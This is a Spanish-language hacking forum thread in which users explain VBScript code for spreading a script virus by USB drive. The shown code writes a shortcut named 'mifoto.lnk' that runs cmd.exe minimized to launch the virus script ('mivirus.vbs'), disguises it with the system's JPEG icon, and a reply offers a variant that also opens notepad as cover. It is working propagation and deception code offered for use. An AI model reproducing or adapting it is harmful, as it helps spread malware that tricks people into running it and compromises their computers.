Autor
|
Tema: Duda sobre USB spread (Leído 4,240 veces)
|
jeshuem
Desconectado
Mensajes: 23
|
Alguien que sea tan amable de explicarme estas lineas que dejo de ejemplo MadAntrax en uno de sus post, no estoy muy familiarizado con este tipo de spread. set lnkobj = WSS.createshortcut (drive.path & "\mifoto.lnk") lnkobj.windowstyle = 7 lnkobj.targetpath = "cmd.exe" lnkobj.workingdirectory = "" lnkobj.arguments = "/c start " & replace(wscript.scriptname," ", chrw(34) & " " & chrw(34)) & "&exit" lnkobj.iconlocation = WSS.regread ("HKEY_LOCAL_MACHINE\software\classes\jpegfile\defaulticon\") lnkobj.save()
|
|
|
En línea
|
|
|
|
xXSCORPIOXx
Desconectado
Mensajes: 26
|
Digamos que basicamente crea el .lnk apuntando hacia el CMD con parametros y asignandole un Icono de imagen.
//Regards.
|
|
|
En línea
|
El saber es como el alcohol, cuando ves que te duele la cabeza, es demasiado tarde.
|
|
|
jeshuem
Desconectado
Mensajes: 23
|
Para ser mas preciso en la linea lnkobj.arguments = "/c start " & replace(wscript.scriptname," ", chrw(34) & " " & chrw(34)) & "&exit"
que argumentos debe tener un lnk para que ejecute un programa?
|
|
|
En línea
|
|
|
|
xXSCORPIOXx
Desconectado
Mensajes: 26
|
Para ser mas preciso en la linea lnkobj.arguments = "/c start " & replace(wscript.scriptname," ", chrw(34) & " " & chrw(34)) & "&exit"
que argumentos debe tener un lnk para que ejecute un programa? Simplemente llama a la aplicacion desde el CMD con "Start", aunque creo que se deberia usar WScript.ScriptFullName, a ver si lo ve MadAntrax. //Regards.
|
|
|
En línea
|
El saber es como el alcohol, cuando ves que te duele la cabeza, es demasiado tarde.
|
|
|
jeshuem
Desconectado
Mensajes: 23
|
Cual es su sintaxis del argumento? sin el codigo como seria?
|
|
|
En línea
|
|
|
|
Mad Antrax
|
No es necesario mandar argumentos a un LNK para que ejecute un fichero, son solo targetpath es suficiente.
En el ejemplo, lo que hace el código es crear un acceso directo a cmd.exe y le cambio el icono de la ventanita negra por la de la foto.jpg
básicamente el acceso sería:
cmd.exe /c start mivirus.vbs&exit
Podría ser también así:
cmd.exe /c start mivirus.vbs&start notepad.exe&exit
(Ese ejemplo ejecuta el virus + notepad y luego cierra el cmd). Si lo combinas con WindowsStyle=7 el cmd se ejecuta minimizado).
Saludos
|
|
|
En línea
|
No hago hacks/cheats para juegos Online. Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
|
|
|
jeshuem
Desconectado
Mensajes: 23
|
La funcion replace que es para remplazar codenas a que viene? replace(wscript.scriptname," ", chrw(34) & " " & chrw(34))
|
|
|
En línea
|
|
|
|
Mad Antrax
|
La funcion replace que es para remplazar codenas a que viene? replace(wscript.scriptname," ", chrw(34) & " " & chrw(34))
No se pueden usar espacios en los nombres. Lo que hago es coger el nombre del fichero y reemplazo el espacio (" ") por chrw(34) & " " & chrw(34)
|
|
|
En línea
|
No hago hacks/cheats para juegos Online. Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
|
|
|
jeshuem
Desconectado
Mensajes: 23
|
Ah ok gracias eres un grande jaja, no sabia que no se podia usar espacios, gracias. Ahora toca pasarlo a delphi.
Saludos.
|
|
|
En línea
|
|
|
|
xXSCORPIOXx
Desconectado
Mensajes: 26
|
No se pueden usar espacios en los nombres. Lo que hago es coger el nombre del fichero y reemplazo el espacio (" ") por chrw(34) & " " & chrw(34)
Eso era lo que a mi me despistaba, sería mejor algo tipo Chr(34) & WScript.ScriptFullName & Chr(34), no? PD: Perdonad que no use Etiquetas, ando desde el movil por viajes de negocios. //Regards.
|
|
|
En línea
|
El saber es como el alcohol, cuando ves que te duele la cabeza, es demasiado tarde.
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
duda sobre formateo y cosa sobre todos los pcs de una casa
Dudas Generales
|
Senior++
|
5
|
5,044
|
27 Agosto 2011, 09:21 am
por Senior++
|
|
|
[vbs][source] spread usb
Scripting
|
daryo
|
1
|
3,240
|
10 Diciembre 2014, 04:24 am
por .BrutuS
|
|
|
Metodo de USB Spread quefuncione?
Análisis y Diseño de Malware
|
Noblex07
|
2
|
3,607
|
7 Junio 2014, 19:27 pm
por daryo
|
|
|
MOVIDO: Metodo de USB Spread quefuncione?
Ingeniería Inversa
|
.:UND3R:.
|
0
|
2,146
|
30 Mayo 2014, 01:55 am
por .:UND3R:.
|
|
|
[VBS] [SOURCE] Dropbox Spread
Análisis y Diseño de Malware
|
.BrutuS
|
2
|
3,435
|
9 Diciembre 2014, 22:12 pm
por .BrutuS
|
|